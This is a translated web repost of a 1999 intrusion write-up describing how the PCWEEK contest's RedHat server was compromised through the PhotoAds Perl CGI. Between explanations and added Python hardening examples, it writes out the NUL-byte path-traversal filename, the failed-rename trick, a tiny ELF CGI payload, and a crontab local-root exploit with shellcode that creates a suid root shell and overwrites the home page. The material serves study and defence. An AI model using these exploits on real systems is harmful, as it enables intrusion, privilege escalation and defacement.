A typical CGI intrusion | http://www.cshu.net




www.cshu.net  2003-1-19  fog rain village

I read this article some time ago and found it rewarding, so I have revised it a little from beginning to end and am posting it here for everyone to share.

PCWEEK's preface to this evaluation is quite interesting:

"$1,000 reward for attacking our server. How do you test the security of a system? We first install a similar application on two operating systems, and then let the whole world attack it. What makes this evaluation different from earlier ones is that the programs running on the servers are real-world programs, specifically a classified-ad system designed for a publishing site. The test is therefore not only a test of the operating system but a test of the whole system. On the NT platform we use ASP, IIS, MTS and SQL Server 7; on the Linux platform we use Apache and mod_perl.

Rules of the game: the targets to attack are securelinux.hackpcweek.com and securent.hackpcweek.com. The condition for winning the $1,000 is to successfully modify the home page, or to obtain the top-secret document named 'top secret'. We reject any action by anyone that damages the server without having achieved success."

PCWEEK published a brief configuration list for each server. The NT configuration list is very long, and that configuration can certainly be called perfect; the RedHat list, by contrast, is only 20 lines, most of them no more than 35 words, and an ordinary user's configuration could reach this standard. Below is the RedHat configuration list:
"Create several partitions /usrvartmpvar on the disk (sic).
Install RedHat 6.0, and do not install services such as SMTP, FTP and NEWS.
Install Photoads (third-party software, CGI written in Perl, implementing a user-written classified-ad function; for details see http://www.hoffice.com/).
chmod 777 the photoads directory,
chmod 755 cgi-bin,
chmod 766 kas_data.pl,
chmod 766 adnumber.num,
chmod 766 ads_data.pl,
chmod 755 all *.cgi files,
use the default directory for the photoads configuration,
set the upload file length to 0,
delete unneeded users,
set root password to (to what?),
disable all services in inetd.conf,
configure Apache to run as user nobody,
disable SSI (server side includes).
This configuration implements the suggestions in the security-howto and the Apache group's security tips."
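The permission lines in this list are the ones that matter later in the article: a world-writable photoads directory, and mode 766 on data files that sit under DocumentRoot (ads_data.pl is later fetched straight over HTTP). The audit script below is an added example, not part of the original article or of PhotoAds; it builds a constructed sample tree with the PCWEEK modes, flags the weak entries, and then audits a hardened layout (755 directory, 640 data files) for comparison. The path names and the data-file suffix list are assumptions.

```python
import os
import stat
import tempfile


def audit_tree(document_root, data_suffixes=(".pl", ".num", ".dat")):
    """Walk document_root and return sorted (relative_path, finding) pairs.

    Findings reported:
      world-writable   - any file or directory with the o+w bit set
      group-writable   - any regular file with the g+w bit set
      data-in-docroot  - a data file (by suffix) that is readable by others,
                         i.e. something the web server will happily serve
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(document_root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, document_root)
            mode = os.lstat(full).st_mode
            if mode & stat.S_IWOTH:
                findings.append((rel, "world-writable"))
            if stat.S_ISREG(mode) and mode & stat.S_IWGRP:
                findings.append((rel, "group-writable"))
            if stat.S_ISREG(mode) and name.endswith(data_suffixes) and mode & stat.S_IROTH:
                findings.append((rel, "data-in-docroot"))
    return sorted(findings)


def build_sample_site(root, photoads_mode, data_mode):
    """Constructed sample tree: a photoads directory, its cgi-bin, and the three
    data files named in the PCWEEK list. File contents are placeholders."""
    photoads = os.path.join(root, "photoads")
    cgi = os.path.join(photoads, "cgi-bin")
    os.makedirs(cgi)
    for name in ("kas_data.pl", "adnumber.num", "ads_data.pl"):
        path = os.path.join(photoads, name)
        with open(path, "w") as fh:
            fh.write("# constructed placeholder data\n")
        os.chmod(path, data_mode)
    script = os.path.join(cgi, "photo.cgi")
    with open(script, "w") as fh:
        fh.write("#!/usr/bin/perl\n")
    os.chmod(script, 0o755)
    os.chmod(cgi, 0o755)
    os.chmod(photoads, photoads_mode)


def demo():
    """Audit the PCWEEK modes (777 photoads, 766 data files) and a hardened
    variant (755 directory, 640 data files owned by the CGI user)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root, 0o777, 0o766)
        weak = audit_tree(root)
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root, 0o755, 0o640)
        hardened = audit_tree(root)
    return weak, hardened


if __name__ == "__main__":
    weak, hardened = demo()
    for item in weak:
        print("PCWEEK layout: %s is %s" % item)
    print("hardened layout findings:", hardened)
```

The hardened layout produces no findings; the better fix, which the script cannot see from modes alone, is to keep the data files outside DocumentRoot entirely so that no permission mistake can expose them over HTTP.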
Did PCWEEK really implement the security-howto suggestions? Actually, no. As a system administrator your responsibility is to keep the system running, and a very important part of that is updating software that has vulnerabilities. Moreover, UNIX is an extremely flexible system, and this kind of software update can certainly be carried out automatically by the system.

In the situation described above, PCWEEK placed the two servers behind a firewall and kept only the web service's port 80 open, so that it could be visited and attacked.

The result was obvious, but it also makes a very dramatic security test of the operating system concerned. First, a vulnerability in the third-party software installed on RedHat allowed a cracker called jfs to get into the system; then jfs used a known system vulnerability (the patch had already been released a month earlier) to obtain root privileges and successfully modify the server's home page.

Below is jfs's account of the attack:
An actual attack analysis (attacking the PCWEEK server), by jfs

First I had to collect information about the host to be attacked: which ports were open, and which of them might be attacked. After a quick check I found that most ports could not be used, being either protected by the firewall or blocked by tcp_wrappers; only the HTTP server was reachable.

    Lemming:~# telnet securelinux.hackpcweek.com 80
    Trying 208.184.64.170...
    Connected to securelinux.hackpcweek.com.
    Escape character is '^]'.
    POST X HTTP/1.0
    HTTP/1.1 400 Bad Request
    Date: Fri, 24 Sep 1999 23:42:15 GMT
    Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
    (...)
    Connection closed by foreign host.
    Lemming:~#
Good, this is a machine running Apache on Red Hat. From PCWEEK's hints I knew the server should also be running mod_perl, but mod_perl leaves certain traces on a server, and the headers this server sent showed no such marks.

Apache 1.3.6 does not ship with any CGI program that a remote user can use, but I did not know whether RedHat had added some, so I tried attacking a few common CGI vulnerabilities (test-cgi, wwwboard, count.cgi ...).

When those attempts failed, I tried to discover the directory structure of the site. From the information I got from the HTML pages I inferred that the web server had the following directories under DocumentRoot:

    /
    /cgi-bin
    /photoads/
    /photoads/cgi-bin

I was immediately interested in photoads; I thought it was very likely an installable software package. After a quick online search I found that photoads is a commercial package distributed by "The Home Office Online" (www.hoffice.com), priced at 149 US dollars, and that it comes with its source code (Perl) so that you can modify it.

I asked a friend to let me look at his photoads. This gave me the chance to see a copy of the software in use on securelinux.

I looked at the default installation files: from the advertisement database (at http://securelinux.hackpcweek.com/photoads/ads_data.pl) I could obtain the advertisement passwords of all users. I also tried to get at the configuration file /photoads/cgi-bin/photo_cfg.pl, but the server's settings prevented me from reaching it.

I found that through the script /photoads/cgi-bin/env.cgi (similar to test-cgi) I could learn where DocumentRoot sits in the file system (/home/httpd/html), together with some other useful data (which user the server runs as: here it runs as nobody).
So my first attempt was to insert commands into the HTML with SSI (server side includes) and mod_perl, in the following way:

    <!--#include file="..." -->   for SSI
    <!--#perl ... -->             for mod_perl

The server scripts filter out most input through a Perl regular expression, leaving almost no room to work with. But I also found that a value supplied by the user is not checked for strange content before it is turned into HTML code. This gave me a chance to insert commands into the HTML code for the server to parse.

Line 36 of post.cgi reads as follows:

    print "You are trying to post an AD from another URL: <b>$ENV{'HTTP_REFERER'}\n";

$ENV{'HTTP_REFERER'} is a variable supplied by the user (to be exact, you need to understand how HTTP headers work); this variable lets us push in any HTML code, of whatever kind.

This was tested with getit.ssi and getit.mod-perl (two scripts, omitted here), used as follows:

    Lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80

But unfortunately this machine had neither SSI nor mod_perl configured, and I was at a dead end.
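The post.cgi line above reflects a request header into HTML without any encoding, which is what makes the SSI and mod_perl directives usable at all. The following is an added example, not code from the article or from PhotoAds, that places the reflected-header pattern beside an escaped version and a simple plausibility check on the header value; the sample Referer values are constructed.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample Referer header values: a normal browser value, and one
# carrying an SSI directive of the kind described in the article.
SAMPLE_REFERERS = [
    "http://securelinux.hackpcweek.com/photoads/",
    '<!--#include file="x" -->',
]

_DIRECTIVE = re.compile(r"<!--#")
_CTRL = re.compile(r"[\x00-\x1f\x7f]")


def render_vulnerable(referer):
    """Mirrors the post.cgi line quoted above: the header value goes into the
    page untouched, so whatever it contains is parsed as HTML (and, where SSI
    or mod_perl is enabled, as a server-side directive)."""
    return "You are trying to post an AD from another URL: <b>%s</b>\n" % referer


def render_hardened(referer):
    """Same message with the untrusted value HTML-escaped; '<', '>', '&' and
    quotes become entities, so no tag or directive can be formed."""
    return "You are trying to post an AD from another URL: <b>%s</b>\n" % html.escape(referer, quote=True)


def is_plausible_referer(referer, max_len=2048):
    """Allow-list check to apply before the value is used for anything:
    a Referer should be an absolute http(s) URL without control characters."""
    if not referer or len(referer) > max_len or _CTRL.search(referer):
        return False
    parts = urlsplit(referer)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def contains_directive(page):
    """True if the rendered page still contains an SSI/mod_perl style marker."""
    return bool(_DIRECTIVE.search(page))


if __name__ == "__main__":
    for ref in SAMPLE_REFERERS:
        print("plausible:", is_plausible_referer(ref))
        print("vulnerable:", render_vulnerable(ref), end="")
        print("hardened:  ", render_hardened(ref), end="")
```

Escaping at the point of output is the part that closes the hole; the plausibility check is a second layer that also keeps the value out of log files and e-mail bodies in raw form.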
I decided to look for vulnerabilities in the CGI scripts. Vulnerabilities in Perl scripts are mostly found in open(), system() or backtick (``) calls: the first allows reading, writing and execution, the latter two allow execution.

The program has none of the latter two, but it does have several open() calls:

    Lemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more
    advisory.cgi: open(DATA, "$BaseDir/$DataFile");
    edit.cgi: open(DATA, ">$BaseDir/$DataFile");
    edit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open!\n";
    photo.cgi: open(ULFD, ">$write_file") || die show_upload_failed("$!");
    photo.cgi: open(FILE, $write_file);
    (...)

(The Perl variable names in this copy of the article were lost in translation; the names shown in the code fragments from here on are reconstructed from the surrounding text and the flow of the argument, not taken from the PhotoAds source.)

There was nothing to be done with most of these, because they are all defined in the configuration file and cannot be changed once the program is running.

But two other lines are worth studying carefully. Line 132 of photo.cgi reads as follows:

    $write_file = "$UploadDir/$FileName";
    open(ULFD, ">$write_file") || die show_upload_failed("$!");
    print ULFD $FORM{'FILE_CONTENT'};
    close(ULFD);

If we could modify the variable $write_file, we could write any file on the system. The variable is defined as follows:

    $write_file = "$UploadDir/$FileName";

The directory part is set by the configuration file, which we have no way to change; so what then?

Line 226 of photo.cgi reads as follows:

    if (!$FORM{'FILE_NAME'}) { show_file_not_found(); }
    $FileName = lc($FORM{'FILE_NAME'});
    $FileName =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
    if ($FileName =~ m/gif/) {
        $Ext = 'gif';
    } elsif ($FileName =~ m/jpg/) {
        $Ext = 'jpg';
    } else {
        &Not_Valid_Image;
    }
The value of $FileName comes from $FORM{'FILE_NAME'} (submitted by the form and parsed into a CGI variable). To get it where we want it, it has to satisfy a regular expression; we cannot simply send the filename we need. For example "../../../../../../../../etc/passwd" is no good: after going through the following substitution, nothing is left of it:

    $FileName =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

If it matches this regular expression, it is turned into ASCII code 1 (SOH). In addition the filename must contain "gif" or "jpg", otherwise it cannot get past the Not_Valid_Image check.

After some attempts, with the help of the Phrack article on Perl CGI security, I finally found that

    /jfs/\../../../../../../export/www/htdocs/index.html%00.gif

lets us submit the file index.html (we have to modify the home page). But before uploading, we also had to find a way to fool some of the script's code.

We found that if we send the form with the POST method we cannot get away with it (the %00 is not decoded), so we could only use GET.
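The filename handling discussed above fails in three independent ways: a NUL byte ends the path at the C level, a backslash gets the traversal string past the substitution, and m/gif/ accepts the substring anywhere in the name. The following added example, not code from the article or from PhotoAds, reproduces that check in Python beside a hardened replacement; the upload directory name is an assumption, and the sample payload is the article's, with %00 decoded.

```python
import os
import re
import secrets

# Constructed locations: the article gives /home/httpd/html as the site's DocumentRoot;
# the upload subdirectory name is an assumption.
UPLOAD_DIR = "/home/httpd/html/photoads/photos"

# The filename the article built (with %00 already URL-decoded to a real NUL byte).
PAYLOAD = "/jfs/\\../../../../../../export/www/htdocs/index.html\x00.gif"

# Same alternation as the photo.cgi substitution quoted above. Perl's \1 in the
# replacement yields $1, which is undefined (empty) when only the second branch matches.
_LAST_COMPONENT = re.compile(r".+\\([^\\]+)$|.+/([^/]+)$")


def original_style_check(raw):
    """Reproduces the photo.cgi logic: lowercase, keep what follows the last
    backslash (or empty the name if only forward slashes are present), then
    accept anything that merely contains 'gif' or 'jpg'. Returns (accepted, name)."""
    name = raw.lower()
    m = _LAST_COMPONENT.search(name)
    if m:
        name = m.group(1) or ""
    if "gif" in name or "jpg" in name:
        return True, name
    return False, name


def hardened_name(raw):
    """Server-side replacement: reject NUL and control bytes outright, discard any
    directory part under either separator, require the extension to be the real
    suffix, and never reuse the client's name for the file on disk."""
    if not raw or re.search(r"[\x00-\x1f\x7f]", raw):
        return None
    base = raw.replace("\\", "/").rsplit("/", 1)[-1].lower()
    stem, ext = os.path.splitext(base)
    if not stem or ext not in (".gif", ".jpg"):
        return None
    return secrets.token_hex(8) + ext


def target_path(name, upload_dir=UPLOAD_DIR):
    """Join the chosen name to the upload directory and confirm, after
    normalisation, that the result still lies inside it."""
    full = os.path.normpath(os.path.join(upload_dir, name))
    if os.path.commonpath([upload_dir, full]) != os.path.normpath(upload_dir):
        raise ValueError("upload path escapes the upload directory")
    return full


if __name__ == "__main__":
    print("original check on payload:", original_style_check(PAYLOAD))
    print("original check on ../../etc/passwd:", original_style_check("../../etc/passwd"))
    print("hardened name for payload:", hardened_name(PAYLOAD))
    safe = hardened_name("My Photo.GIF")
    print("hardened name for 'My Photo.GIF':", safe, "->", target_path(safe))
```

The two halves of the fix are deliberately separate: rejecting the name is cheap and catches the NUL and traversal cases, while choosing the on-disk name on the server side means a client name that slips through a future check still cannot select where the bytes land.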
At line 256 of photo.cgi we can see a section of code that checks the content of the file we have just uploaded. If the file does not conform to the specified image specification (mainly width, height and size), the script deletes or rewrites the file, which is not what we want to see; at the very least we must leave some of our material on the server. (Note: photo.cgi is the script used to upload the advertisement picture used by your advertisement.)

PCWEEK set ImageSize to 0 in the configuration file, so we do not have to care about the JPG part and can concentrate our attention on the GIF part.
(Variable names reconstructed.)

    if (substr($FileName, -4, 4) eq ".gif") {
        open(FILE, $write_file);
        my $buf;
        my $GifHeaderFmt = "A6vvb8CC";
        my $PictDescFmt = "vvvvb8";
        read FILE, $buf, 13;
        (my $sig, $width, $height, my $flags, my $bg, my $aspect) = unpack $GifHeaderFmt, $buf;
        close FILE;
        $PhotoWidth = $width;
        $PhotoHeight = $height;
        $PhotoSize = $size;
        return;
    }

Line 140 of photo.cgi reads as follows:

    if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
        &Not_Valid_Image;
    }
    if ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
        &Height_Width;
    }

So we have to make $PhotoWidth smaller than 700, not "", and smaller than ImgWidth (default 350); that is, $PhotoWidth != "" && $PhotoWidth < 350. As for $PhotoHeight, it has to be smaller than ImgHeight (default 250). So $PhotoWidth = $PhotoHeight = 0 is just right. From the way the script assigns these values, all we need is to set bytes 6 to 9 to the value 0 (NUL).
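The GIF check above looks at thirteen bytes and never at the signature, which is why a file with zeros in bytes 6 to 9 satisfies it. The following added example, not the article's or PhotoAds' code, parses the same header layout with Python's struct module, reproduces the quoted width/height tests, and shows a stricter validator beside them; the sample files are constructed.

```python
import struct

# Same layout the Perl "A6vvb8CC" unpack reads: 6-byte signature, little-endian width
# and height, packed flags, background index, aspect ratio (13 bytes in total).
GIF_HEADER = struct.Struct("<6sHHBBB")

# Limits quoted in the article: the hard ceiling in photo.cgi and the
# ImgWidth / ImgHeight defaults.
HARD_MAX_WIDTH = 700
IMG_WIDTH, IMG_HEIGHT = 350, 250

# Constructed sample uploads.
REAL_GIF = b"GIF89a" + struct.pack("<HHBBB", 100, 80, 0x00, 0, 0) + b"\x3b"
WIDE_GIF = b"GIF89a" + struct.pack("<HHBBB", 400, 80, 0x00, 0, 0) + b"\x3b"
# A non-image whose bytes 6 through 9 are zero, the property the article relies on;
# here the first bytes are simply an ELF-style magic followed by zeros.
ZERO_DIMS = b"\x7fELF\x01\x01" + b"\x00" * 8


def parse_gif_header(data):
    """Return the header fields as a dict, or None if fewer than 13 bytes."""
    if len(data) < GIF_HEADER.size:
        return None
    sig, width, height, flags, bg, aspect = GIF_HEADER.unpack_from(data)
    return {"signature": sig, "width": width, "height": height,
            "flags": flags, "bg": bg, "aspect": aspect}


def original_style_ok(data, img_width=IMG_WIDTH, img_height=IMG_HEIGHT):
    """The checks quoted from photo.cgi line 140 onward, as reconstructed in the
    article: width present and not above 700, width/height not above the
    configured maxima. The signature is never looked at and 0x0 passes."""
    hdr = parse_gif_header(data)
    if hdr is None or hdr["width"] > HARD_MAX_WIDTH:
        return False
    if hdr["width"] > img_width or hdr["height"] > img_height:
        return False
    return True


def hardened_ok(data, img_width=IMG_WIDTH, img_height=IMG_HEIGHT):
    """Validate the file as a GIF rather than as 13 bytes that happen to unpack:
    real signature, non-zero dimensions within limits, and the GIF trailer byte."""
    hdr = parse_gif_header(data)
    if hdr is None or hdr["signature"] not in (b"GIF87a", b"GIF89a"):
        return False
    if not (0 < hdr["width"] <= img_width and 0 < hdr["height"] <= img_height):
        return False
    return data[-1] == 0x3B


if __name__ == "__main__":
    for label, blob in (("real gif", REAL_GIF), ("wide gif", WIDE_GIF), ("zero dims", ZERO_DIMS)):
        print("%-9s original=%-5s hardened=%s" % (label, original_style_ok(blob), hardened_ok(blob)))
```

Even the hardened check is only a header check; a production upload handler would decode the image fully (or re-encode it) so that the bytes stored on disk are ones the server produced, not ones the client chose.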
With the above we made sure our FILE_CONTENT meets the conditions, and went on to the next step ... (variable names again reconstructed):

    chmod 0755, $write_file;
    $new_file = "$UploadDir/$AdNum.$Ext";
    rename($write_file, $new_file);
    Show_Upload_Success();

After the above code our file is renamed, or rather moved, to a place we do not want. Looking at the final code that checks the relevant variable, we saw that it may only contain digits:

    $FORM{'AdNum'} =~ tr/0-9//cd;
    $FORM{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
    $AdNum = $FORM{'AdNum'};

Everything else is stripped out, so we cannot use the ../../../ trick here.
What to do? The rename() function takes two path parameters, the new one and the old one ... and it has no error checking, so if it fails the program simply carries on. How can we make it fail? With an illegal filename. The default maximum filename length on a Linux system is 1024 (MAX_PATH_LEN), so what if we could make the script give our file a name longer than 1024 bytes?

In the next step we submit an advertisement serial number (AD number) about 1024 bytes long.

Now the script did not behave as hoped, because it only lets us upload a picture for an advertisement number that already exists. (Creating that 10^1024 number would have cost us a lot of time.)

Another dead end?

No: that imperfect input-checking function gives us a chance to improve on this number. Browse quickly through the script edit.cgi and think: if you enter a name, then a carriage return, and finally those 1024 digits, what happens? Ha ha, there it is.

That long .adnum file lets us create a new advertisement.

Once we could fool the advertisement number check below, we could use the script to do the following: create or overwrite any file on which nobody has permission, and make its content whatever we want (except that the GIF part must keep its NUL bytes).

Good, let's try.
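Two gaps combine in the steps above: the ad number is filtered down to digits but never bounded in length, and rename() is called without looking at its result. The added example below, not code from the article or from PhotoAds, shows a bounded validator next to the tr/0-9//cd behaviour, and a rename wrapper that reports failure and removes the half-finished upload; the temporary directory and file names are constructed.

```python
import os
import re
import tempfile

# An advertisement number is digits only AND bounded; the tr/0-9//cd in the
# article only strips non-digits, it never limits the length.
MAX_AD_DIGITS = 12
_AD_NUMBER = re.compile(r"[0-9]{1,%d}" % MAX_AD_DIGITS)


def original_style_ad_number(raw):
    """Equivalent of tr/0-9//cd: keep the digits, drop everything else, no limit."""
    return "".join(ch for ch in raw if ch.isdigit())


def validate_ad_number(raw):
    """Strict form: the whole value must be 1..MAX_AD_DIGITS digits, nothing dropped."""
    return _AD_NUMBER.fullmatch(raw) is not None


def checked_rename(src, dst):
    """rename() with the error handling the article says photo.cgi lacks.
    On failure the half-finished upload is removed so nothing is left behind
    under the name the client chose. Returns (ok, errno)."""
    try:
        os.rename(src, dst)
    except OSError as exc:
        try:
            os.unlink(src)
        except OSError:
            pass
        return False, exc.errno
    return True, 0


def demo():
    """Constructed run in a temp dir: a normal rename, then a rename to an
    over-long name (1024 digits, the length used in the article) that fails."""
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "upload.tmp")
        with open(src, "wb") as fh:
            fh.write(b"GIF89a")
        ok, err = checked_rename(src, os.path.join(d, "1234.gif"))

        src2 = os.path.join(d, "upload2.tmp")
        with open(src2, "wb") as fh:
            fh.write(b"GIF89a")
        ok2, err2 = checked_rename(src2, os.path.join(d, "9" * 1024 + ".gif"))
        leftover = os.path.exists(src2)
    return ok, ok2, err2, leftover


if __name__ == "__main__":
    print("original filter on 'name\\n42':", original_style_ad_number("name\n42"))
    print("strict check on 1024 digits:", validate_ad_number("9" * 1024))
    print("demo (ok, ok2, errno2, leftover):", demo())
```

Rejecting the value outright, rather than cleaning it, also closes the edit.cgi trick the article describes, where a name followed by a newline and a run of digits survives the filter as a new ad number.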
The script overwrite.as.nobody confirmed that we had obtained the permissions described above.

All good so far; we adjusted the script to overwrite index.html ... but it did not succeed. Possibly we had no permission to change this file (perhaps because its owner is root, or because it has no write permission set).

What to do? We looked for another way out. We tried to overwrite a CGI, to see whether we could make it work for us. That way we could look for the "top-secret" document, and victory would be in sight.

We modified the overwrite script, and very good: it lets us overwrite CGIs!

We decided not to modify the important (relatively rigorous) CGIs; we chose advisory.cgi (what is it for, anyway?).

This lets us upload a shell script that allows us to execute commands; that would be too good ... But when you run a shell script via CGI, you have to declare it in the first line of the script, like this:

    #!/bin/sh
    echo "Content-type: text/html"
    echo
    find / -name "*secret*" -print
But don't forget: bytes 6, 7, 8 and 9 had to be 0 or a very small value, to fit the image-size rules ...

    #!/bi\00\00\00\00n/sh

That is no good: the kernel reads only the first 5 bytes and then tries to execute "#!/bi" ... I know of no shell I could run whose path fits in 3 bytes (beyond the two bytes of "#!"). Another dead end ...

ELF (the default executable format on Linux) gave us the answer: it turned out that we could set those several bytes to 0x00 and it still ran. Wonderful.

Now we needed to put the ELF executable on the remote server. We had to make it conform to the URL standard, because we can only use the GET method, not POST, so at the very least we had to fit within the longest URI limit. For the Apache server the longest URI is 8190 bytes, and don't forget that we also had to use the very large 1024-character number, so the space left for the URL-encoded ELF program was only about 7000 bytes. It could only be something very small.
    Lemming:~/pcweek/hack/POST# cat fin.c
    #include <stdio.h>
    #include <unistd.h>
    main()
    {
        printf("Content-type: text/html\n\n\r");
        fflush(stdout);
        execlp("/usr/bin/find", "find", "/", (char *)0);
    }

After compiling:

    Lemming:~/pcweek/hack/POST# ls -l fin
    -rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*
    Lemming:~/pcweek/hack/POST# strip fin
    Lemming:~/pcweek/hack/POST# ls -l fin
    -rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
    Lemming:~/pcweek/hack/POST#

Then make it conform to the URL standard:

    Lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
    Lemming:~/pcweek/hack/POST# ls -l fin.url
    -rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url

For use in our script this was too large.

Relying only on intuition, we edited the binary by hand, deciding to delete everything in the executable after the string "GCC". There is almost no theoretical basis for doing this; to do it properly one should study the ELF standard, but it seemed to work:

    Lemming:~/pcweek/hack/POST# joe fin
    Lemming:~/pcweek/hack/POST# ls -l fin
    -rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
    Lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
    Lemming:~/pcweek/hack/POST# ls -l fin.url
    -rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
    Lemming:~/pcweek/hack/POST#

Now we combined the results of our work and ran it ... We looked for the files named get, sec and find in our directory, hoping to get more information. The to_url script can be found there, along with some simple C files; these things, together with the URL encoding, did the job.
Now we upload this CGI, then visit it with our browser:

    wget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi

In this way we carried out a comprehensive search of the server. But their "top-secret" document was not there, or could not be accessed as nobody. We tried some combinations of commands, such as locate, ls and a few others, but it was no help. If the file existed, it was somewhere we could not see.

Now the problem was serious: root privileges were needed. My straightforward friend said: why not use what is ready-made? So, based on what we knew about the server (Linux, i386, because my machine is i386 and my ELF file had already run on it), we searched the software update information and found that every version of RedHat is vulnerable to the crontab bug (translator's note: the details are discussed later). You can find it on recent bugtraq/securityfocus. Excellent: we modified it to suit our needs; obviously we did not need an interactive root shell at all, it was enough to make a suid root shell that nobody could access:
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <unistd.h>
    #include <pwd.h>

    char shellcode[] =
    "\xeb\x40\x5e\x89\x76\x0c\x31\xc0\x89\x46\x0b\x89\xf3\xeb"
    "\x27w00w00:Ifwewerehackerswedownyourdumbass\x8d\x4e"
    "\x0c\x31\xd2\x89\x56\x16\xb0\x0b\xcd\x80\xe8\xbb\xff\xff"
    "\xff/tmp/w00w00";

    int main(int argc, char *argv[])
    {
        FILE *cfile, *tmpfile;
        struct stat sbuf;
        int x;

        chdir("/tmp");
        cfile = fopen("/tmp/cronny", "a+");
        tmpfile = fopen("/tmp/w00w00", "a+"); // , S_IXUSR|S_IXGRP|S_IXOTH);
        fprintf(cfile, "MAILTO=");
        for (x = 0; x < 96; x++)
            fprintf(cfile, "w00w00");
        fprintf(cfile, "%s", shellcode);
        fprintf(cfile, "\n* * * * * date\n");
        fflush(cfile);
        fprintf(tmpfile, "#!/bin/sh\ncp /bin/bash /tmp/.bs\nchmod 4755 /tmp/.bs\n");
        fflush(tmpfile);
        fclose(cfile), fclose(tmpfile);
        chmod("/tmp/w00w00", S_IXUSR|S_IXGRP|S_IXOTH);
        execl("/usr/bin/crontab", "crontab", "/tmp/cronny", (char *)0);
    }
After our modifications, this shell pointed at /tmp/.bs. We re-uploaded the CGI, ran it with our browser, and then got ready to test.

We had the CGI perform a first test, running ls /tmp. We had really obtained a suid root shell.

    (...)
    execlp("/bin/ls", "ls", "-ula", "/tmp", (char *)0);
    (...)

We then uploaded /tmp/xx, the file to replace index.html with.

    (...)
    execlp("/tmp/.bs", "ls", "-c", "cp /tmp/xx /home/httpd/html/index.html", (char *)0);
    (...)

The program that finally had to run:

    (...)
    execlp("/tmp/.bs", "ls", "-c", "cp /tmp/xx /home/httpd/html/index.html", (char *)0);
    (...)

At this point the game was over. In all it took 20 hours.

Finally we uploaded our material, with a copy in a safe place where nobody would obviously look, then sent a message to the discussion group and started waiting for replies.


